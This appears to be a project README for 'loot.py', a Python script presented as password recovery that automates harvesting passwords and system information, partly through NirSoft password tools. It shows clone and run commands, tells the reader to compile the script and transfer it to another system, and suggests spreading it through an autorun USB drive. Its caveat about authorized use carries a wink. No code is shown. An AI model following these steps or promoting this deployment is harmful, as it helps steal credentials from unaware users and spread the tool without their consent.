A python script to automate gathering passwords and information from the current user and operating system.
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
git clone https://github.com/dishantrathi/Password-Recovery-using-Python.git
- Python v3.6 - As Base
To run the program, simply execute
- For Windows
py loot.py
- For Linux
python3 loot.py
More Simple than you think. Run the loot.py file.
- What is loot?
A python script to automate gathering passwords and information from the current user and operating system.
- Configuration
In order to use loot on a Windows system, you will need the executables provided by NirSoft (password tools).
NirSoft's Password Recovery Tools: http://nirsoft.net/password_recovery_tools.html http://www.nirsoft.net/utils/wireless_key.html
- Make sure to download tools with command-line options. [Provided Already]
Extract these to a folder named windows in the same directory where you currently have this script.
- Execution
Compile for desired operating system (Linux, OSX, Win).You can use either PyInstaller or Py2Exe for that! Then simply transfer file to system and execute it.
- For use in computer systems where you are authorized! ;)
Create an Autorun File and Execute through a USB Device or Pendrive.
This project is licensed under the MIT License - see the LICENSE.md file for details